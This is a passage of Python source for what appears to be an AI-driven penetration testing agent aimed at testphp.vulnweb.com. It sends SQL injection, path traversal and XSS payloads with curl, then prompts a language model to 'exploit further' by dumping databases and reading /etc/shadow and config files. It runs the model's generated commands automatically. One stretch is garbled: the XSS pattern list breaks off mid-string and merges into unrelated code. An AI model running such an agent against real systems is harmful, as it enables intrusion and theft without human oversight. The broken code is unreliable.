tool, args in commands[:10]: result = self.run_command(tool, args, timeout=60) # Check for vulnerability indicators in response self._check_vuln_indicators(result) def _check_vuln_indicators(self, result: Dict): """Check command output for vulnerability indicators.""" output = result.get("output", "").lower() cmd = result.get("command", "") vuln_patterns = { "SQL Injection": [ r"mysql.*error", r"syntax.*error.*sql", r"odbc.*driver", r"postgresql.*error", r"ora-\d{5}", r"microsoft.*sql.*server", r"you have an error in your sql", r"mysql_fetch", r"unclosed quotation" ], "XSS": [ r""', f'-s -k "{target}/showimage.php?file=....//....//....//etc/passwd"', f'-s -k "{target}/AJAX/infoartist.php?id=1\' OR \'1\'=\'1"', f'-s -k "{target}/hpp/?pp=12"', f'-s -k "{target}/comment.php" -d "name=test&text="', ] for args in additional_tests: result = self.run_command("curl", args) self._check_vuln_indicators(result) # For each confirmed vulnerability, try to exploit further for vuln in self.vulnerabilities[:5]: print(f"\n [*] Deep exploiting: {vuln['type']}") deep_prompt = f"""A {vuln['type']} vulnerability was confirmed. Command that found it: {vuln['command']} Evidence: {vuln['evidence'][:1000]} Generate 5 commands to exploit this further: - For SQLi: Try to extract database names, tables, dump data - For XSS: Try different payloads, DOM XSS, stored XSS - For LFI: Read sensitive files like /etc/shadow, config files, source code Output as: [EXEC] curl: [arguments]""" system = "You are exploiting a confirmed vulnerability. Go deeper." response = self.llm_manager.generate(deep_prompt, system) commands = self._parse_ai_commands(response) for tool, args in commands[:5]: self.run_command(tool, args, timeout=90) def _parse_ai_commands(self, response: str) -> List[Tuple[str, str]]: """Parse AI commands from response.""" commands = [] patterns = [ r'\[EXEC\]\s*(\w+):\s*(.+?)(?=\[EXEC\]|\[DONE\]|\Z)', r'\[TEST\]\s*(curl)\s+(.+?)(?=\[TEST\]|\[DONE\]|\Z)', ] for pattern in patterns: matches = re.findall(pattern, response, re.DOTALL | re.IGNORECASE) for match in matches: tool = match[0].strip().lower() args = match[1].strip().split('\n')[0] args = re.sub(r'[`"\']$', '', args) if tool in ['curl', 'nmap', 'sqlmap', 'nikto', 'nuclei', 'ffuf', 'gobuster', 'whatweb']: commands.append((tool, args)) return commands def _generate_final_report(self, targets: List[str], findings: List[Dict]) -> str: """Generate comprehensive penetration test report.""" # Build detailed context context = "=== COMPLETE TEST RESULTS ===\n\n" # Group by potential vulnerability type sqli_results = [] xss_results = [] lfi_results = [] other_results = [] for cmd in findings: output = cmd.get('output', '') command = cmd.get('command', '') if any(x in command.lower() for x in ["'", "or 1=1", "union", "select"]): sqli_results.append(cmd) elif any(x in command.lower() for x in ["script", "alert", "onerror", "xss"]): xss_results.append(cmd) elif any(x in command.lower() for x in ["../", "etc/passwd", "php://filter"]): lfi_results.append(cmd) else: other_results.append(cmd) context += "--- SQL INJECTION TESTS ---\n" for cmd in sqli_results[:10]: context += f"CMD: {cmd.get('command', '')[:150]}\n" context += f"OUT: {cmd.get('output', '')[:800]}\n\n" context += "\n--- XSS TESTS ---\n" for cmd in xss_results[:10]: context += f"CMD: {cmd.get('command', '')[:150]}\n" context += f"OUT: {cmd.get('output', '')[:800]}\n\n" context += "\n--- LFI TESTS ---\n" for cmd in lfi_results[:10]: context += f"CMD: {cmd.get('command', '')[:150]}\n" context += f"OUT: {cmd.get('output', '')[:800]}\n\n" context += "\n--- OTHER TESTS ---\n" for cmd in other_results[:15]: if cmd.get('output'): context += f"CMD: {cmd.get('command', '')[:150]}\n" context += f"OUT: {cmd.get('output', '')[:500]}\n\n" report_prompt = f"""Generate a PROFESSIONAL penetration test report from these REAL scan results. TARGET: {', '.join(targets)} {context} === CONFIRMED VULNERABILITIES DETECTED === {json.dumps(self.vulnerabilities, indent=2) if self.vulnerabilities else "Analyze the outputs above to find vulnerabilities!"} === REPORT FORMAT (FOLLOW EXACTLY) === # Executive Summary [2-3 sentences: what was tested, critical findings, risk level] # Vulnerabilities Found For EACH vulnerability (analyze the scan outputs!): --- ## [CRITICAL/HIGH/MEDIUM/LOW] Vulnerability Name | Field | Value | |-------|-------| | Severity | Critical/High/Medium/Low | | CVSS | Score | | CWE | CWE-XX | | Location | Exact URL | ### Description What this vulnerability is and why it's dangerous. ### Proof of Concept **Request:** ```bash curl "[exact command from scan results]" ``` **Payload:** ``` [exact payload that triggered the vulnerability] ``` **Response Evidence:** ``` [paste the ACTUAL response showing the vulnerability - SQL error message, XSS reflection, file contents, etc.] ``` ### Impact What an attacker can do with this vulnerability. ### Remediation How to fix it. --- # Summary | # | Vulnerability | Severity | URL | |---|--------------|----------|-----| [table of all findings] # Recommendations [Priority-ordered remediation steps] --- CRITICAL: - LOOK at the actual outputs in the scan results - If you see SQL errors like "mysql", "syntax error" = SQL INJECTION - If you see your script tags reflected = XSS - If you see file contents like "root:x:0:0" = LFI - INCLUDE the actual evidence from the scans - testphp.vulnweb.com HAS known vulnerabilities - find them in the results!""" system = """You are a senior penetration tester writing a professional report. Analyze the ACTUAL scan results provided and document REAL vulnerabilities found. Include working PoCs with exact commands and evidence from the outputs. Do NOT say "no vulnerabilities" if there is evidence of vulnerabilities in the scan data.""" return self.llm_manager.generate(report_prompt, system) def get_allowed_tools(self) -> List[str]: return self.tools_allowed